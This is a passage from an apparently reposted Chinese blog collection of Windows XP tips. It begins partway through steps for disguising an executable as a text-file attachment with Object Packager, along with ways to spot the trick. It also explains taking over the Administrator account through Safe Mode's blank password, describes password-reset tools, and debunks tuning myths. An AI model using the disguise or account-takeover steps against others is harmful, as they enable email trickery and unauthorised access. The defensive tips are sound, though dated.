在刚出现的notepad.exe及其图标上点击鼠标右键，选择“编辑包”，打开对象包装程序，选择“插入图标”按钮，选择“浏览”，选择WINDOWS\SYSTEM\SHELL32.DLL，在当前图标框中选择一个你想要的图标，比方说选择一个文本文件的图标，然后按“确定”。然后选择菜单“编辑”?“卷标”，任意定义一个名字，比方说hello.txt，点击“确定”。 3. 退出对象包装程序，在提示是否更新时选择“是”。 4. 好，现在出现在面前的是hello.txt，一般人会认为它是一个地地道道的文本文件附件，相信没有人怀疑它是别的东西。请你双击这个图表，看看会发生什么?是不是发现它打开的是notepad.exe!如果它是一个病毒文件，结果可想而知! 事实上，当你用OutLook2000收到这样一个邮件时，它会显示这是一个带附件的邮件，当你以为它是一个文本文件附件双击打开时，视野会提示:部分对象携带病毒，可能对你的计算机造成危害，因此，请确保该对象来源可*。是否相信该嵌入对象?安全观念强的人一般会选择“不”(这就对了)，一般的人可能会选择是(你惨了!)。 识别方法:不要怕，尽管它的迷惑性极大，但是仍然会露出一些马脚: 1. 它其实是一个对象链接与嵌入对象，并不是附件，选择它时，选择框会不同于选择附件的选择框。点鼠标右键出现的菜单不同。 2. 双击打开它时，安全提示与附件的安全提示不同，这点非常重要。这时，应该选择“不”，然后点击鼠标右键，选择“编辑包”，提示是否信任该对象时选择“是”，在对象包装程序的右边内容框中，将现出原形。在本例中，会显示“NOTEPAD.EXE的备份”，文件是否可执行，关键在这里。 3. 因为它不是附件，在选择“文件”?“保存附件”时并无对话框出现。 4. 由于并不是所有的邮件收发软件都支持对象嵌入，所以这类邮件的格式不一定被某些软件识别，如OutLook Express。但是视野的使用面很广，尤其是在比较大的、有自己邮件服务器的公司，所以还是有必要提醒大家小心嵌入对象，不光是视野，其实词、优秀等支持嵌入对象的软件可以让嵌入对象改头换面以迷惑人。 Win XP系统的超级管理员 Administrators帐户 2009-02-08 15:42:42 被75人转藏 | 小贴士:测试:你的内心到底偏男偏女, Win XP系统的超级管理员安全忠告 Windows XP凭借极高的安全性和稳定性，赢得了广大用户的青睐。我们可以通过建立个人账户、设定密码来保护自己的个人隐私，还可以用 Administrators(超级管理员)的身份任意设置账户，为每一个账户设置不同的权限，可以说拥有至高无上的权利，也拥有系统的“生杀大权”，享有系统最高级别的安全保障。 但是，如果我告诉你，我能不费吹灰之力就可以将你这个Administrators给废掉，取而代之的是我成为Administrators，你信不信?呵呵，你不信?好，我们来试一试: 步骤一 重新启动计算机，在出现启动菜单时按F8键进入高级选项菜单，选择“安全模式”进入系统; 步骤二 打开“控制面板”，找到“用户和密码”选项，看看是不是账户中包括Administrators?好，现在将Administrators账户删除，重新创建一个Administrators，或是更改原来的Administrators账户密码; 步骤三 重新启动计算机后，只有输入新的密码才能登录Windows XP。 为什么会出现这种问题呢?原因很简单:Windows XP真正的超级管理员账号应该是在安全模式下的Administrators，并不是在正常模式下的Administrators。在默认情况下，安全模式下的Administrators密码为空。无论用户在正常模式下将Administrators密码设置得多么复杂，安全性多么高，如果没有设置安全模式下的Administrators密码，你的电脑将毫无秘密可言。 现在，你是不是对Windows XP的安全性有些担忧了?那怎么办?这还不简单:赶紧进入安全模式，设置Administrators密码，将自己提升为真正的Administrators!当然，这次设置的密码要记牢了，否则下次你就真的无法进入Windows XP了! 不再垂帘听政 让Administrator发挥作用 安装Windows xp时，如果设置了一个管理员帐户，那么系统内置没有密码保护 Administrators管理员帐户是不会出现在用户登录列表中的，虽然它身在幕后，可却拥有系统最高权限，为了方便操作及保证系统安全，可以先给它设置密码，然后再把它请到台前来，以下便是具体方法: ?使用“传统登录提示”登录 启动系统到欢迎屏幕时按两次“ctrl+alt+delete”组合键，在出现的登录框中输入Administrators单击“更改用户登录或注销的方式”，去掉“使用欢迎屏幕前的复选框，单击“应用选项”即可在启动时直接输入Administrators帐户名及密码登录。 ?在登录的欢迎屏幕显示Administrators帐户 单击“开始?运行”输入regedit后回车定位到 “[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Win logon\SpecialAccounts\UserList]”分支，将右边的Administrators的值改为“1”，即可让Administrators帐户出现在登录的欢迎屏幕上。 ?自动登录到Administrators帐户 单击“开始?运行”输入“control.exe userpasswords2”后回车，在打开 的“用户帐户”窗口去掉“要使用本机用户必须输入密码”前的复选框，按应用后，在弹出的“自动登录”窗口中输入Administrators帐户密码，按两次“确定”即可。注意:如果原来就设置了其它帐户自动登录，应该选中“要使用本，用户必须输入密码”前的复选框按“应用”后，再去掉选中的复选框，也可以修改注册表实现自动登录，不过没有以上方法方便。 当然如果不要Administrators帐户，可以依次打开“开始?控制面板?管理工具?计算机管理”在“计算机管理”窗口中选中“帐号已停用”前的复选框，按“确定”即可停用Administrators帐户。 XP操作系统启动的详细过程 2009-02-08 15:42:11 被43人转藏 | 小贴士:史上最牛的脑筋急转弯,敢来挑战么, 简单的说就是这样: 从按下计算机开关启动计算机，到登入到桌面完成启动，一共经过了以下几个阶 段: 1. 预引导(Pre-Boot)阶段; 2. 引导阶段; 3. 加载内核阶段; 4. 初始化内核阶段; 5. 登陆。 详细的说，就是这样: 首先让我们来了解一些基本概念。第一个是大家非常熟悉的BIOS(基本输入输出系统)，BIOS是直接与硬件打交道的底层代码，它为操作系统提供了控制硬件设备的基本功能。BIOS包括有系统BIOS(即常说的主板BIOS)、显卡BIOS和其它设备(例如IDE控制器、SCSI卡或网卡等)的 BIOS，其中系统BIOS是本文要讨论的主角，因为计算机的启动过程正是在它的控制下进行的。BIOS一般被存放在ROM(只读存储芯片)之中，即使在关机或掉电以后，这些代码也不会消失。 第二个基本概念是内存的地址，我们的机器中一般安装有32MB、64MB或128MB内存，这些内存的每一个字节都被赋予了一个地址，以便CPU访问内存。32MB的地址范围用十六进制数表示就是0,1FFFFFFH，其中0,FFFFFH的低端1MB内存非常特殊，因为最初的8086处理器能够访问的内存最大只有1MB，这1MB的低端640KB被称为基本内存，而A0000H,BFFFFH要保留给显示卡的显存使用，C0000H,FFFFFH则被保留给BIOS使用，其中系统BIOS一般占用了最后的64KB或更多一点的空间，显卡BIOS一般在C0000H,C7FFFH处，IDE控制器的 BIOS在C8000H,CBFFFH处。 第一步:当我们按下电源开关时，电源就开始向主板和其它设备供电，此时电压还不太稳定，主板上的控制芯片组会向CPU发出并保持一个RESET(重置)信号，让 CPU内部自动恢复到初始状态，但CPU在此刻不会马上执行指令。当芯片组检测到电源已经开始稳定供电了(当然从不稳定到稳定的过程只是一瞬间的事情)，它便撤去RESET信号(如果是手工按下计算机面板上的Reset按钮来重启机器，那么松开该按钮时芯片组就会撤去RESET信号)，CPU马上就从地址 FFFF0H处开始执行指令，从前面的介绍可知，这个地址实际上在系统BIOS的地址范围内，无论是Award BIOS还是AMI BIOS，放在这里的只是一条跳转指令，跳到系统BIOS中真正的启动代码处。 第二步: 系统BIOS的启动代码首先要做的事情就是进行POST(Power,On Self Test，加电后自检)，POST的主要任务是检测系统中一些关键设备是否存在和能否正常工作，例如内存和显卡等设备。由于POST是最早进行的检测过程，此 时显卡还没有初始化，如果系统BIOS在进行POST的过程中发现了一些致命错误，例如没有找到内存或者内存有问题(此时只会检查640K常规内存)，那么系统BIOS就会直接控制喇叭发声来报告错误，声音的长短和次数代表了错误的类型。在正常情况下，POST过程进行得非常快，我们几乎无法感觉到它的存在，POST结束之后就会调用其它代码来进行更完整的硬件检测。 第三步:接下来系统BIOS将查找显卡的BIOS，前面说过，存放显卡BIOS的ROM芯片的起始地址通常设在C0000H处，系统BIOS在这个地方找到显卡 BIOS之后就调用它的初始化代码，由显卡BIOS来初始化显卡，此时多数显卡都会在屏幕上显示出一些初始化信息，介绍生产厂商、图形芯片类型等内容，不过这个画面几乎是一闪而过。系统BIOS接着会查找其它设备的BIOS程序，找到之后同样要调用这些BIOS内部的初始化代码来初始化相关的设备。 第四步: 查找完所有其它设备的BIOS之后，系统BIOS将显示出它自己的启动画面，其中包括有系统BIOS的类型、序列号和版本号等内容。 第五步: 接着系统BIOS将检测和显示CPU的类型和工作频率，然后开始测试所有的RAM，并同时在屏幕上显示内存测试的进度，我们可以在CMOS设置中自行决定使用简单耗时少或者详细耗时多的测试方式。 第六步: 内存测试通过之后，系统BIOS将开始检测系统中安装的一些标准硬件设备，包括硬盘、CD,ROM、串口、并口、软驱等设备，另外绝大多数较新版本的系统BIOS在这一过程中还要自动检测和设置内存的定时参数、硬盘参数和访问模式等。 第七步: 标准设备检测完毕后，系统BIOS内部的支持即插即用的代码将开始检测和配置系统中安装的即插即用设备，每找到一个设备之后，系统BIOS都会在屏幕上显示出设备的名称和型号等信息，同时为该设备分配中断、DMA通道和I/O端口等资源。 第八步: 到这一步为止，所有硬件都已经检测配置完毕了，多数系统BIOS会重新清屏并在屏幕上方显示出一个表格，其中概略地列出了系统中安装的各种标准硬件设备，以及它们使用的资源和一些相关工作参数。 第九步: 接下来系统BIOS将更新ESCD(Extended System Configuration Data，扩展系统配置数据)。ESCD是系统BIOS用来与操作系统交换硬件配置信息的一种手段，这些数据被存放在CMOS(一小块特殊的RAM，由主板上的电池来供电)之中。通常ESCD数据只在系统硬件配置发生改变后才会更新，所以不是每次启动机器时我们都能够看到“Update ESCD„ Success”这样的信息，不过，某些 主板的系统BIOS在保存ESCD数据时使用了与Windows 9x不相同的数据格式，于是Windows 9x在它自己的启动过程中会把ESCD数据修改成自己的格式，但在下一次启动机器时，即使硬件配置没有发生改变，系统BIOS也会把ESCD的数据格式改回来，如此循环，将会导致在每次启动机器时，系统BIOS都要更新一遍ESCD，这就是为什么有些机器在每次启动时都会显示出相关信息的原因。 第十步: ESCD更新完毕后，系统BIOS的启动代码将进行它的最后一项工作，即根据用户指定的启动顺序从软盘、硬盘或光驱启动。以从C盘启动为例，系统BIOS 将读取并执行硬盘上的主引导记录，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个活动分区的分区引导记录，而分区引导记录将负责读取并执行IO.SYS，这是DOS和Windows 9x最基本的系统文件。Windows 9x的IO.SYS首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，Windows将继续进行DOS部分和GUI(图形用户界面)部分的引导和初始化工作。 如果系统之中安装有引导多种操作系统的工具软件，通常主引导记录将被替换成该软件的引导代码，这些代码将允许用户选择一种操作系统，然后读取并执行该操作系统的基本引导代码(DOS和Windows的基本引导代码就是分区引导记录)。 上面介绍的便是计算机在打开电源开关(或按Reset键)进行冷启动时所要完成的各种初始化工作，如果我们在DOS下按Ctrl，Alt，Del组合键(或从Windows中选择重新启动计算机)来进行热启动，那么POST过程将被跳过去，直接从第三步开始，另外第五步的检测CPU和内存测试也不会再进行。我们可以看到，无论是冷启动还是热启动，系统BIOS都一次又一次地重复进行着这些我们平时并不太注意的事情，然而正是这些单调的硬件检测步骤为我们能够正常使用电脑提 供了基础。 更改Windows默认的软件安装路径 2009-02-08 15:41:39 被26人转藏 | 小贴士:测试:你究竟是个什么样子的人, 一、修改注册表 1.在Windows98中:点击开始菜单，进入运行对话框，在对话框中输入“regedit”，打开注册表编辑器。打开 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。 2.在Windows NT/2000/XP中:打开 HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion主键并选中它，双击右边窗口中的“SourcePath”，在键值中输入需要的路径即可。 二、用软件来解决 1.运行“Windows优化大师”，单击“系统清理维护”，单击“系统个性设置”，然后在“更改Windows安装盘位置”框中键入需要的路径，单击“设置”，重新启动电脑即可。 2.启动“超级兔子魔法设置”后，选择“系统”一项，进入后在“系统信 息”里有一项“安装盘位置”，修改它即可。 走出误区戳穿XP的经典谣言 2009-02-08 15:41:13 被35人转藏 | 小贴士:QQ秘籍训练营,用QQ懂QQ 网上和很多杂志上流传了很多关于Windows XP的优化、设置攻略、技巧等，很多被奉为"经典"、"圣经"，事实上当我们仔细辨别这些所谓的"终极技巧"，会发现其中不少都是不负责任的。这些东西很大程度上误导了Windows XP的使用者，甚至带给了他们难以挽回的损失。"实践才是检验真理的唯一标准～"，今天让我们一起来揭开这些谣言的神秘面纱，告诉你什么才是真正的解决之道。 经典误区一:忘记密码后的"高招" 经典程度:???? 危险程度:????? 1.错误的解决方法描述 当你在使用Windows XP时，不小心将管理员密码忘记了，改怎么办呢,网上流行着这么一种方法:使用DOS启动盘(如果Windows XP所在分区是NTFS分区，则需要支持NTFS的DOS启动盘)进入DOS实模式， 将%SystemRoot%\system32\config目录下一个名为sam的文件删除。重新启动系统，Administrator的登录密码已经为空，我们可以轻松登录系统。 小知识:Windows NT/2000/XP中对用户账户的管理采用了安全账号管理器(Security AccountManager,SAM)的机制，该机制对帐户的管理不是通过直接确认用户名和密码的形式，而是通过安全标识(SID)进行的。SID号在帐户创建时就同时创建，一旦账号被删除，SID也一并被删除。系统的SID信息是以"SID s-1-5-21-xxxxxxxxxxxxxx-xxxxxxxxxxxxxx-005"这样的形式保存在%SystemRoot%\system32\config\sam文件里。 2.方案的由来及后果 这种错误方法来源于以前对Windows 2000忘记密码的处理方式，Windows 2000(未安装Service Pack)的用户如果忘记管理员密码，可以采用该方法顺利破解登录密码。该方案的理论支持为:Windows XP的密码存放在sam文件中，当我们登录系统时，系统会自动验证sam数据库信息，如发现此次密码和用户名与sam文件中的加密数据想吻合时，系统就会顺利登录。反之，则无法登录。如果将该文件删除，则sam数据库会被清空，管理员的登录密码也随之清空，自然可以逃过Windows XP的登录密码验证机制。 实际上该方法对Windows 2000 SP1-SP4都已经无效，对Windows XP更是毫无用处，如果大家按照该方案对Windows XP进行操作，会出现无法启动的情况，给我们的操作带来了更大的麻烦。 3.正确的解决办法: 当Windows XP登录密码丢失时，我们可以针对不同的情况采用不同的办法来解决: (1)如果在安装Windows XP时，Administrator密码设置为空。大家可以在系统引导的时候按F8进入安全模式，这里的Administrator口令为空，可以直接进入，进入后对帐户和密码进行设置即可。 (2)如果设置了Administrator口令，破解的办法就没那么简单了，我们可以使用超强的Windows 2000/XP系统维护光盘——ERD Commander 2003。使用该光盘启动系统后，运行"开始?管理?工具?密码修改"命令打开"ERD Commander 2003 LockSmith Wizard"窗口，在"帐号"框中输入要破解的帐户名，然后输入新的密码就ok了。 小提示:?ERD Commander为共享软件，它的官方主页为:，ERD Commander 2003汉化版的ISO文件下载地址为:,买到集成了ERD Commander的启动光盘。 经典误区二:启动进度"只跑一圈"的秘密 经典程度:????? 危险程度:? 1.错误的解决方法描述 (1)右键单击"我的电脑"，选择"属性"菜单打开"系统属性"设置窗口，切换到"高级"选项卡，在"启动和故障"恢复栏单击"设置"，在弹出的窗口中单击"编辑"按钮，将"[operating systems]multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect"中的"fastdetect"修改为"nodetect"。 (2)使用微软的"加速"软件Bootvis可以加速WindowsXP的启动过程。方法如下:下载该软件后，运行"Tools?Options"命令，将"Symbol"设置为Bootvis的安装路径，单击"Save"。再运行"Trace?Next Boot"命令打开"Trace Repetitions" 窗口，单击"OK"即可。 2.方案的由来及后果 第一种"优化"方法比较滑稽，大家可以尝试在Google中以"nodetect"为关键字进行搜索，得到的网页多数都是中国网站转载的"Windows XP优化技巧"页面。按道理说，如此神奇的优化技巧，国外的站点不可能没有提及的。其实答案就在于，这个参数纯粹是"子虚乌有"，真不知道是哪一位国内高人最先发明的这一招。修改后虽然不见系统有什么问题出现，但能实现"优化"效果绝对是胡说八道或者是心理作用。 第二种方法提到的微软推出的Bootvis，其实这款免费软件的作用是对系统的启动进行可视化性能追踪，开发人员能够用这个工具追踪系统启动或唤醒上出现的问题。 小提示:微软官方已经澄清了关于"使用Bootvis可加速系统启动"的谣言，并且已经停止了对该工具的技术支持。 3.正确的解决办法: 对于第一种优化方法中提到的修改boot.ini文件的方法，应该保持默认，即参数为"/fastdetect"，该参数表示系统在启动过程中不检测串口鼠标。此外以下方法大家也可以尝试: (1)如果你使用的是Intel芯片组的主板，可以安装Intel发布的程序加速软件包--Intel Application Accelerator，并将你的主板驱动升级到最新版本。如果使用的是nForce芯片组，则安装其最新的3.43版整合驱动程序。 (2)在BIOS中将平时不使用的设备(比如Modem)设置为"Disabled"。如果你的机器有多个IDE设备，那么打开设备管理器，找到"IDE ATA/ATAPI 控制器"一项下面的"主要IDE通道"和"次要IDE通道"，分别在两者"属性"窗口的"高级设置"选项卡下将不用IDE设备的"设备类型"设置为"无"。这样系统在启动时不会把时间浪费在检测IDE通道上根本没有的硬盘上。 (3)运行MSconfig命令，将其中不必要的启动项去掉，笔者的一向设置是取消全部启动程序，你可以根据自己的情况调整。 (4)手动设置网卡IP地址，很多朋友反应在进入Windows XP后，系统会"假死" 长达几分钟，实际上这是由于系统在搜索网络上的DHCP服务器，通过手动设置网卡的IP地址可以有效的解决这一问题。 (5)此外，定期进行磁盘碎片整理、关闭不必要的系统服务、整理注册表都可以加快系统的启动速度。 小提示: ?Windows XP会使用系统BIOS的SBF(Simple Boot Flag)来加速启动过程，如果你的主板BIOS支持SBF的话，XP启动就会快得多。 ?还有一个比较经典的技巧:在注册表编辑器的"[HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Session Manager\MemoryManagement\PrefetchParameters] "一项，将名为EnablePrefetcher的DWORD键值设置为"1"。该优化原理是利用系统的预读取技术(Prepatch)，当设置为"1"时，系统在启动的时候仅预读应用程序部分，可以让Windows XP的进度条少跑几圈，大家使用该方法可以明显感到效果。但实际上系统整个启动的时间并不会减少多少，甚至会更长，所以请谨慎使用该技巧。"EnablePrefetcher"的其它参数设置分别为: 0--不使用预读取功能、2--预读取启动部分、3--预读取启动和应用程序部分。 经典误区三:灵犀一指，网络"飞速" 经典程度:????? 危险程度:? 1.错误的解决方法描述 运行"Gpedit.msc"命令打开Windows XP的组策略管理窗口，依次定位到"计算机配置?管理模板?网络?QoS数据包调度程序"一项，双击"限制可保留带宽"，选中"已启用"按钮，并将其值设置为"0%"。 2.方案由来及后果 这个网络优化技巧纯粹是"独撰"的。QoS(联网服务质量)，是指在整个网络连接上应用的各种通信或程序类型优先技术。微软的专家指出:"与Windows 2000一样，在 Windows XP 中，程序也可以通过QoS应用程序编程接口 (API)来利用QoS。所有程序可以共享百分之百的网络带宽，特别要求带宽优先权的程序除外。其他程序也可以使用这种"保留"的带宽，正在发送数据的请求程序除外。默认情况下，程序保留的带宽累计可达终端计算机每个接口的基本链接速度的百分之二 十。如果保留带宽的程序发送的数据量没有完全用完带宽，保留带宽的未用部分可用于同一主机上的其他数据流。"也就是说，如果我们不需手动禁用这部分保留带宽，系统会自动分配剩余的带宽给相应的程序访问网络。 3.正确的解决办法 其实网络速度的快慢主要还是由ISP提供的带宽决定的，很多软件打着"让你的网速倍增"的旗号，大可不必相信。 经典误区四:虚拟内存这么设最"科学"～ 经典程度:????? 危险程度:?? 1.错误的解决方法描述 (1)在"我的电脑"的"属性"窗口，切换到"高级?性能?虚拟内存"窗口，将虚拟内存的初始值和最大值设置为同一值可以减少磁盘碎片，提高系统运行效率。 (2)分别在硬盘的每个分区上都设置一部分虚拟内存，可以提高系统的性能。 2.方案由来及后果 Windows采用动态的方法对虚拟内存进行管理，也就是说当在执行耗费内存比较大的程序(如Photoshop、MS Office等)时，系统会自动扩大虚拟内存的页面文件的体积，以获得更多的可用资源，反之，如果物理内存还有较多的空闲空间，系统则会自动缩小页面文件的体积。这就是我们在察看系统中的pageflie.sys(Windows 2000/XP)或win386.swp(Windows 9X/Me)文件时，该文件有时候大有时候小的原因所在。 理论上来讲，如果将虚拟内存的初始值和最大值设置为同一值，这样可以让磁头连续读取，不容易出现磁盘碎片，从而提高系统的运行效率。但在实际使用的过程中，我们会发现，当我们读取某个大文件的时候，常常遇到“内存溢出”错误，系统反而运行不稳定。 而对于所谓"将硬盘的每个分区都设置虚拟内存"的处理办法，由于各个分区上文件分布的不确定性，导致磁盘碎片的不可避免，虽然Windows会优先选择使用不常进行文件读写操作的分区中的页面文件，不过这样会加重系统内存管理的负担，尽管算不上很多的谬误，但至少不是最好的方案。 小知识:所谓"虚拟内存"，通俗的讲，就是当我们的物理内存不够用的时候，系统将硬盘上的部分空间模拟成内存使用，将暂时不用的程序或数据存放到这部分空间中，等需要的时候方便及时调用。虚拟内存在Windows 9X/Me中对应的数据 临时存放文件为win386.swp(我们称为交换文件，Swapfile)，在Windows 2000/XP 中对应的数据临时存放文件为Pagefile.sys(我们称为页面文件或者分页文件，PageFile)。页面文件保存在硬盘分区的根目录中，文件属性为"隐藏"，我们需要在"文件夹选项"中选中"显示所有文件"才能看到它。 3.正确的解决办法: 对于虚拟内存如何设置的问题，微软已经给我们提供了官方的解决办法，对于一般情况下，我们推荐采用如下的设置方法: (1)在Windows系统所在分区设置页面文件，文件的大小由你对系统的设置决定。具体设置方法如下:打开"我的电脑"的"属性"设置窗口，切换到"高级"选项卡，在"启动和故障恢复"窗口的"写入调试信息"栏，如果你采用的是"无"，则将页面文件大小设置为2MB左右，如果采用"核心内存存储"和"完全内存存储"，则将页面文件值设置得大一些，跟物理内存差不多就可以了。 小提示:对于系统分区是否设置页面文件，这里有一个矛盾:如果设置，则系统有可能会频繁读取这部分页面文件，从而加大系统盘所在磁道的负荷，但如果不设置，当系统出现蓝屏死机(特别是STOP错误)的时候，无法创建转储文件 (Memory.dmp)，从而无法进行程序调试和错误报告了。所以折中的办法是在系统盘设置较小的页面文件，只要够用就行了。 (2)单独建立一个空白分区，在该分区设置虚拟内存，其最小值设置为物理内存的1.5倍，最大值设置为物理内存的3倍，该分区专门用来存储页面文件，不要再存放其它任何文件。之所以单独划分一个分区用来设置虚拟内存，主要是基于两点考虑:其一，由于该分区上没有其它文件，这样分区不会产生磁盘碎片，这样能保证页面文件的数据读写不受磁盘碎片的干扰;其二，按照Windows对内存的管理技术，Windows会优先使用不经常访问的分区上的页面文件，这样也减少了读取系统盘里的页面文件的机会，减轻了系统盘的压力。 (3)其它硬盘分区不设置任何页面文件。当然，如果你有多个硬盘，则可以为每个硬盘都创建一个页面文件。当信息分布在多个页面文件上时，硬盘控制器可以同时在多个硬盘上执行读取和写入操作。这样系统性能将得到提高。 小提示:允许设置的虚拟内存最小值为2MB，最大值不能超过当前硬盘的剩余空间值，同时也不能超过32位操作系统的内存寻址范围——4GB。 经典误区五:IE这样操作就"安全"了～ 经典程度:????? 危险程度:???? 1.错误的解决方法描述 在使用IE浏览网页后，为了防止本地的用户窃取我们的隐私信息，只需做以下操作即可:在IE中运行"工具?Internet 选项"打开"Internet属性"窗口，在其中清除掉IE的脱机文件、历史记录、Cookies，清除表单，再重新启动电脑。 2.方案由来及后果 也许你会认为上面的隐私保护方案完美无缺。其实不然，你的浏览记录还乖乖的躺在电脑里呢～问题就出在一个名为index.dat的文件上～这个index.dat(该文件为属性为隐藏)在你的Temporary Internet Files、history、Cookies文件夹里都存在，文件大小从几十KB到几十MB不等，它记录了你所访问过的网址URL、访问时间，并将其指向浏览器缓存文件夹的几个子文件夹，以提高IE的浏览速度。我们在IE中执行"删除脱机文件"、"清除历史记录"、"清除表单"命令时，系统中的index.dat文件并不会被删除，而且比较恼火的是当我们试图删除它的时候，系统会提示该文件正在使用，不能执行删除操作。其安全隐患在于，一些有不明目的的偷窥者可以通过特殊的工具(如Index.dat Viewer，它的下载地址为:,的浏览记录。 3.正确的解决办法 如果你对隐私信息非常在意，除了常常采用的删除IE临时文件等保护错误外，我们在下网后还需要将index.dat删除。我们可以使用一些软件来删除它，如Spider，它的下载地址为:。安装运行该软件后首先运行"Option"命令，在弹出窗口中勾选"Remove all the cookies"、"Remove the Temporary Internet Files Remove the history Files" ，确认后单击工具栏上的"Start Search"按钮开始扫描，扫描完毕后单击"Clean Up"按钮即可彻底清除隐私文件了。 如果你不想安装软件，也可以手动删除它，具体方法为:新建一个具有管理员权限的帐户，用该帐户登录，打开资源管理器，搜索"index.dat"，注意在搜索的高级选项中要选择"搜索系统文件"和"搜索隐藏的文件和文件夹"，将搜索的所有结果全部删除。删除完毕再删除该帐户即可。执行以下的删除步骤后，系统会在下次启动时在相应目录重新建立一个新的空index.dat文件，不会影响我们的正常使用。 小提示: ?其中有部分index.dat文件会提示正在使用不能删除，不必理会，那是由于这些index.dat文件为当前用户所有。 ?Windows 9X同样存在这个安全隐患，使用该系统的用户可以这样删除index.dat文件:在DOS实模式下，用del命令分别删除 C:\windows\cookies\index.dat、C:\windows\history\index.dat、C:\windows\Temporary Internet Files\index.dat三个文件。 经典误区六:干掉Svchost.exe进程～ 经典程度:???? 危险程度:?? 1.错误的解决方法描述 当我们按下Alt+Ctrl+Del打开任务管理器，发现进程中出现多个Svchost.exe，则表明系统中毒，我们首先将所有的Svchost结束掉，然后使用相关的杀毒工具查杀病毒。 2.方案由来及后果 在很多人的印象中，每个应用程序一般只对应一个进程，如QQ对应QQ.EXE进程、记事本对应notepad.exe进程等。所以当看到系统有多个同样名字的进程时，总是会将其联想为病毒或者木马程序在作怪。如果不加思索，野蛮的将其中的某些Svchost.exe进程结束掉，会让系统的运行变得不稳定。 3.正确的解决办法 Windows进程分为独立进程和共享进程两种，Svchost.exe属于后者。Windows XP为了节约系统资源，将很多个系统服务做为共享方式由Svchost.exe来启动。Svchost本身只是作为服务宿主，并不能实现任何服务功能，svchost通过调用相应服务的动态链接库(DLL)来启动该服务，而Windows将这些服务分为几个组，同组的服务共享一个Svchost进程，不同的组所指向的Svchost不同。通常情况下，Windows XP有4个由Svchost启动的服务组，也就是说Windows XP系统一般有4个Svchost.exe进程。当然某些应用程序或服务也有可能会调用Svchost，所以当你看到系统中有多余4个的Svchost.exe进程，也不要盲目判断系统中了病毒。实际上Svchost.exe进程的个数跟是否中毒无直接关系。 小提示: ?笔者做了下面一个非常有趣的测试:打开任务管理器，切换到"进程"选项卡，首先手动结束掉由上到下的第三个Svchost.exe进程，结束完后系统会马上重新建立该进程，接下来我们手动结束掉由上到下的最后一个Svchost.exe进程，系统会出现一个类似中了冲击波病毒的对话窗口，并倒计时关机，这是由于该Svchost.exe进程引导RPC服务，终止该进程则导致RPC服务中断，系统自然会重新启动了。 ?Windows 2000中一般有两个Svchost.exe进程，Windows Server 2003则非常多，一般有6个。 既然系统中Svchost.exe进程数与是否中毒无关，我们究竟如何区别正常的和病毒伪造的Svchost进程呢,我们可以使用下面两种方法来鉴别: 方法一:在系统所在分区进行搜索，如果发现多个Svchost.exe文件，则系统很有可能中毒。正常的Svchost.exe位于%windir%\system32目录下，如果发现其它目录中有Svchost.exe文件，你就要小心了。例如冲击波的变种Win32.Welchia.Worm会在%windir%\system32\wins目录种下Svchost.exe文件。 方法二:察看Svchost.exe进程对应文件的路径。Windows XP自带的任务管理器中无法察看，我们需要借助第三方工具，例如Windows优化大师自带的进程管理工具，运行它后定位到Svchost.exe进程，可以看到它对应的运行文件的真实路径。 小提示: ?不少木马程序会采用将自己伪装成跟常见进程相似的文件名或者相同的文件名但扩展名不相同，如果你在任务管理器中看到Scvhost.exe、Svch0st.exe等进程，肯定有木马已经植入你的系统。 ?很多朋友在查看CPU占用率时，一个叫做"System Idle Process"的进程常常会显示为90-99%。不必担心，实际上恰恰相反的是这里的90-99%是CPU资源空闲了出来的资源。这里的数字越大表示CPU可用资源越多，数字越小则表示CPU资源越紧张。 其它错误的说法和方案 1.在安装Windows XP后，删除C:\Windows\System32\Dllcache下的所有文件，可以节约大概200MB的磁盘空间。 点评:该文件夹里保存的是系统备份的dll文件，Windows在安装驱动、软件、升级的时候可能会用到里面的文件，如果将其删除会给我们带来更大的不便。 2.由于系统空间比较宝贵，很多朋友将软件安装在其它分区，但每次安装软件时提示的默认安装路径都是C:\Program Files，我们可以打开注册表，定位到"[HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion]"，将右边窗口中的ProgramFilesDir字符串值修改为我们想要的路径。 点评:这样设置确实让我们方便不少。但它带来很多弊端，比如打开Outlook Express时，会报告C盘磁盘已满或者内存不足的错误，并提示"MSOE.dll无法初始化"，另外还可以引起Media Player等系统程序的运行故障。 3.修改\%Systemroot%\System32\Drivers\Etc文件夹下的host.sam文件。 点评:很多朋友使用修改host文件的办法来屏蔽恶意网站，这点没错。不过很多人却没搞清楚到底哪个文件是"host文件"。在Windows 98下存在一个host.sam文件，该文件只是微软为我们修改host文件做的一个范例文件，如果我们修改host.sam文件根本达不到任何效果，真正的host文件是一个名为"host"没有扩展名的文件。而在Windows XP下，所谓"host.sam"文件根本不存在，我们修改host文件应该是用记事本打开 \%Systemroot%\System32\Drivers\Etc目录下的host文件(同样没有扩展名)。 4.要将jpg文件与版本的ACDSEE(4.0以下的版本)建立文件关联，只需要运行"regsvr32 /u shimgvw.dll"命令。 点评:这种办法的确可以让ACDSEE和jpg格式文件建立文件关联，但该命令卸载了Windows XP的图片预览功能，有点矫枉过正。正确的方法是:删除注册表中的"[HKEY_CLASSES_ROOT\ SystemFileAssociations\image]"项。 Win XP远程桌面实现双管理员同时登录 2009-02-08 15:40:24 被25人转藏 | 小贴士:测试:你的内心到底偏男偏女, 为系统添加远程桌面 默认状态下，Windows 2000及其之前的系统并没有安装远程桌面，要想在这些系统中使用远程桌面，需要自己手工添加。 在Windows XP系统安装光盘的“SUPPORT\TOOLS”目录中，可找到一个名为“Msrdpcli.exe”的程序，它实际上就是远程桌面连接登录器。将此程序复制到没有远程桌面的系统中并运行后，即可自动在系统中安装远程桌面连接程序。安装过程非常简单，连续点击“下一步”即可，当安装完成后，点击“开始?程序?附件?通讯?远程桌面连接”，便能登录网络连接远程计算机了。 让远程桌面支持多用户 Windows XP不支持多个用户同时登录远程桌面，当其他用户远程登录Windows XP时，主机上当前已登录的用户即会自动退出。不过在Windows XP 